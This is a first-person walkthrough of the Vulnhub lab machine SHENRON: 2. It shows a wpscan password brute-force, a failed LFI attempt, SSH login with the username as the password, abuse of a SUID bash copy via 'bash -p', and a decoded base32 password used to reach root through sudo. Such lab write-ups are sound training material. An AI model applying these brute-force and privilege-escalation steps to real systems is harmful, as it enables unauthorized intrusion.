SHENRON: 2

This is SHENRON: 2 from Vulnhub. It says difficulty is ‘beginner’. It took me about an hour.

Ports

SSH on 22, plus HTTP on ports 80 and 8080 - hey, that’s a lot like the last one!

HTTP/80

Looks to be a pretty basic template page with nothing juicy. Moving on…

HTTP/8080

Wordpress. I add shenron to /etc/hosts and run wpscan; trivial password hmmm.

──(root💀kali)-[/opt/vulnhub/shenron2]
└─# wpscan -U admin -P /usr/share/wordlists/fasttrack.txt --url http://shenron:8080 
# etc etc
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / admin                                                                                                                  
Trying admin / god Time: 00:00:03 <========================                                             > (130 / 352) 36.93%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: admin

Okay well that was easy, now what? We can’t upload a plugin (can’t copy it to the destination directory), and we can’t edit the templates (all set as non-writeable). There are several non-standard plugins installed, being:

Classic Editor
Elementor, and
Site Editor

Checking out searchsploit reveals issues with Site Editor and Elementor, but for the version we have it’s only Site Editor, which has an LFI vulnerability. I check /etc/passwd first and then look for SSH keys, nope. Can’t read any logs, no /proc/self/environ, can’t read wp-config. I run Turbo Intruder with a nice big list of files and get plenty of hits but nothing that will leverage into RCE. Now what - this was supposed to be beginner level?

Well, we’ve got two users - Jenny and Shenron. Surely we can’t just SSH in with the username as the password?

┌──(root💀kali)-[/opt/vulnhub/shenron2]
└─# ssh jenny@192.168.1.197                                                                                                          130 ⨯
jenny@192.168.1.197s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

30 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Mon Apr  5 20:18:23 2021 from 192.168.1.6
jenny@shenron-2:~$

Oh wait yes we can. Not sure how I feel about this. Anyway….

Shenron

Well, there’s nothing useful in wp-config.php anyway. Linpeas doesn’t highlight it, but it does find a non-standard SUID binary:

-rwsr-xr-x 1 root root 17K Apr 6 00:36 /usr/bin/Execute

I wonder what it does?

jenny@shenron-2:/dev/shm$ file /usr/bin/Execute
/usr/bin/Execute: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cedff63201c18a7326f645ca521f0d47eb0b85b7, for GNU/Linux 3.2.0, not stripped
jenny@shenron-2:/dev/shm$ strings /usr/bin/Execute

Command 'strings' not found, but can be installed with:

apt install binutils
Please ask your administrator.

jenny@shenron-2:/dev/shm$ /usr/bin/Execute
jenny@shenron-2:/dev/shm$ id
uid=1001(jenny) gid=1001(jenny) groups=1001(jenny)

So … nothing? Nah, can’t be right.

──(root💀kali)-[/opt/vulnhub/shenron2]
└─# scp jenny@192.168.1.197:/usr/bin/Execute execute 
# etc
┌──(root💀kali)-[/opt/vulnhub/shenron2]
└─# strings execute 
# etc
/usr/bin/cp /bin/bash /mnt/bash; /usr/bin/chmod 777 /mnt/bash; /usr/bin/chown shenron:shenron /mnt/bash; /usr/bin/chmod u+s /mnt/bash
# much more etc

Right. So, it’s making a copy of /bin/bash, putting it in /mnt/bash and adding the SUID bit. So if we do this:

jenny@shenron-2:/dev/shm$ id
uid=1001(jenny) gid=1001(jenny) groups=1001(jenny)
jenny@shenron-2:/dev/shm$ /mnt/bash -p
bash-5.0$ id
uid=1001(jenny) gid=1001(jenny) euid=1000(shenron) groups=1001(jenny)

We get a new EUID.

Root

With out newfound powers of EUID we can do some more enumeration and find (and read) a file owned by Shenron:

bash-5.0$ ls -lash
total 16K
4.0K drwx------  2 shenron shenron 4.0K Apr  5 19:13 .
4.0K drwxr-xr-x 16 shenron shenron 4.0K Apr  6 00:43 ..
4.0K -rwx------  1 shenron shenron   32 Apr  5 19:13 local.txt
4.0K -rwx------  1 shenron shenron   97 Apr  5 19:10 .pass

This contains his password, base32 encoded:

bash-5.0$ cat .pass
KNUEK3SSN5HFG2CFNZJG6TSTNBCW4UTPJZJWQRLOKJXU4U3IIVXFE32OIBJWQRLOKJXU4I2TNBCW4UTPJZIGCU3TK5XVEZAK

Which is:

ShEnRoNShEnRoNShEnRoNShEnRoNShEnRoN@ShEnRoN#ShEnRoNPaSsWoRd

And since shenron is in the sudoers group, we’re done:

bash-5.0$ su shenron
Password: 
shenron@shenron-2:~/Desktop$ sudo su
[sudo] password for shenron: 
root@shenron-2:/home/shenron/Desktop# cd /root
root@shenron-2:~# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
shenron-2
Monday 12 April 2021 06:21:49 PM IST
root@shenron-2:~#

And now it’s bedtime.